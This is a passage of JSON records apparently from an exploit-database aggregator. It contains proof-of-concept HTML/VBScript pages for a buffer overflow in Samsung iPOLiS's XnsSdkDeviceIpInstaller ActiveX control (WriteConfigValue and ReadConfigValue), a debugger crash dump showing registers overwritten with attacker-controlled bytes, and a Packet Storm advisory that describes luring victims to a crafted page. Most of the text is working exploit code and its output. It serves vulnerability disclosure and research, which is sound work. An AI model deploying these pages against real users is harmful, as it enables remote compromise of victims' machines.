Samsung\n-->\n<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>\n<object 
classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>\n<script>\nvar arg1 = \"\";\nvar arg2=\"praveend\";\n\nfor (i=0; i<= 15000; i++)\n{\n\targ1 += \"A\";\n}\n\ntarget.WriteConfigValue(arg1 ,arg2);\n\n</script>\n</html>\n\n<!--\n#############Stack Trace####################\nException Code: ACCESS_VIOLATION\nDisasm: 149434\tMOV AL,[ESI+EDX]\n\nSeh Chain:\n--------------------------------------------------\n1 \t647C7D7D \tmfc100.dll\n2 \t647D0937 \tmfc100.dll\n3 \t64E242CA \tVBSCRIPT.dll\n4 \t77B3E0ED \tntdll.dll\n\n\nCalled From Returns To\n--------------------------------------------------\nXNSSDKDEVICE.149434 41414141\n41414141 414141\n414141 3DA4C4\n3DA4C4 mfc100.647790C1\nmfc100.647790C1 56746C75\n\n\nRegisters:\n--------------------------------------------------\nEIP 00149434\nEAX 00003841\nEBX 00609FB0 -> 0015A564\nECX 00003814\nEDX 00414141\nEDI 0000008F\nESI 0000008F\nEBP 002BE5FC -> Asc: AAAAAAAAAAA\nESP 002BE564 -> 0000000C\n\n\nBlock Disassembly:\n--------------------------------------------------\n149423\tXOR EDI,EDI\n149425\tXOR ESI,ESI\n149427\tMOV [EBP-8C],ECX\n14942D\tTEST ECX,ECX\n14942F\tJLE SHORT 00149496\n149431\tMOV EDX,[EBP+8]\n149434\tMOV AL,[ESI+EDX]\t <--- CRASH\n149437\tCMP AL,2F\n149439\tJNZ SHORT 00149489\n14943B\tMOV ECX,EBX\n14943D\tTEST ESI,ESI\n14943F\tJNZ SHORT 0014944D\n149441\tPUSH 159F28\n149446\tCALL 0014F7C0\n14944B\tJMP SHORT 00149476\n\n\nArgDump:\n--------------------------------------------------\nEBP+8\t00414141\nEBP+12\t003DA4C4 -> Asc: defaultV\nEBP+16\t647790C1 -> EBE84589\nEBP+20\tFFFFFFFE\nEBP+24\t646CBE5C -> CCCCCCC3\nEBP+28\t0000001C\n\n\nStack Dump:\n--------------------------------------------------\n2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]\n2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]\n2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\n2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
[................]\n2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]\n\n-->", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:05", "description": "", "published": "2015-02-21T00:00:00", "type": "packetstorm", "title": "Samsung iPolis Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0555", "CVE-2014-3911"], "modified": "2015-02-21T00:00:00", "id": "PACKETSTORM:130478", "href": "https://packetstormsecurity.com/files/130478/Samsung-iPolis-Buffer-Overflow.html", "sourceData": "`CVE-2015-0555 \n \nIntroduction \n************************************************************* \n \nThere is a Buffer Overflow Vulnerability which leads to Remote Code \nExecution. \nVulnerability is due to input validation to the API ReadConfigValue and \nWriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx \n \nThis is different from CVE-2014-3911 as the version of iPolis 1.12.2 \n(latest as of 12/12/2014). \nCVE-2014-3911 is related to different ActiveX and on older iPolis version \n \nDiscovery MEthod: Fuzzing \nExploiting: It is a client side attack where attacker can host a crafted \nHTML web page with malicious payload and entice the victim to browse to the \nhosted page to compromise the victim. 
\n \nOperating System: Windows 7 Ultimate N SP1 \n \n************************************************************* \nVulnerability1: \n*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution* \n******************Proof of Concept (PoC)**************8 \n</html> \n<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() \nRemote Code Execution</head> \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> \n<script language='vbscript'> \n \ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device \nManager\\XnsSdkDeviceIpInstaller.ocx\" \nprototype = \"Function ReadConfigValue ( ByVal szKey As String ) As String\" \nmemberName = \"ReadConfigValue\" \nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\" \nargCount = 1 \n \narg1=String(1044, \"A\") \n \ntarget.ReadConfigValue arg1 \n \n</script> \n</html> \n \n \n***************************************************************************************** \n*Vulnerability2: * \n*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution \n* \n \n*******************Proof of Concept (PoC)********************* \n \n<html> \n<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> \n<script language='vbscript'> \n \ntargetFile = \"C:\\Program Files\\Samsung\\iPOLiS Device \nManager\\XnsSdkDeviceIpInstaller.ocx\" \nprototype = \"Function WriteConfigValue ( ByVal szKey As String , ByVal \nszValue As String ) As Long\" \nmemberName = \"WriteConfigValue\" \nprogid = \"XNSSDKDEVICELib.XnsSdkDevice\" \nargCount = 2 \n \narg1=String(14356, \"A\") \narg2=\"defaultV\" \n \ntarget.WriteConfigValue arg1 ,arg2 \n \n</script></job></package> \n</html> \n**************************************************************************** \n \nCERT contacted Samsung but there wasn't any response from Samsung. 
\nRefer http://blog.disects.com for more details \n \nBest Regards, \nPraveen Darshanam \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130478/samsungipolis-overflow.txt"}]}